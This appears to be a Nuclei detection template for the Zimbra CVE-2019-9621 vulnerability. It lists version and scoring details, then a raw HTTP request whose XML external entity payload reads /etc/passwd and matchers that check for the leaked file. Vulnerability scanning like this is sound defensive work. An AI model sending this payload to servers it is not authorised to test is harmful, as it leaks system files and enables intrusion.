id: CVE-2019-9621
info:
name: Zimbra Collaboration Suite - SSRF
author: riteshs4hu
severity: high
description: |
Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via the ProxyServlet component.
impact: |
Attackers can perform SSRF, potentially leading to internal network access or further exploitation.
remediation: |
Update to the latest patched versions: 8.6 patch 13, 8.7.11 patch 10, 8.8.10 patch 7, or 8.8.11 patch 3 or later.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/zimbra_xxe_rce.rb
- https://nvd.nist.gov/vuln/detail/cve-2019-9621
- http://packetstormsecurity.com/files/153190/Zimbra-XML-Injection-Server-Side-Request-Forgery.html
- https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html
- https://bugzilla.zimbra.com/show_bug.cgi?id=109127
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-9621
cwe-id: CWE-918
epss-score: 0.80906
epss-percentile: 0.99582
cpe: cpe:2.3:a:zimbra:collaboration_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: zimbra
product: collaboration_server
shodan-query: html:"Zimbra Collaboration Suite Web Client"
tags: cve,cve2019,zimbra,collaboration-server,oast,oob,xxe,kev,vkev,vuln
http:
- raw:
- |
POST /autodiscover HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0"?>
<!DOCTYPE soap [
<!ELEMENT soap ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<Autodiscover>
<Request>
<EMailAddress>[email protected]</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
matchers:
- type: dsl
dsl:
- regex('root:.*:0:0:', body)
- contains(body, "response schema")
- contains(header, "text/html")
condition: and
# digest: 490a0046304402204386dc2089cda3f76cb9b5e072417382b84d29eedf09d743139d0e653c0b149302200a547eddf1cbf75f157934f45dbd0ba17556833dd81007d0597374231b0308bc:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation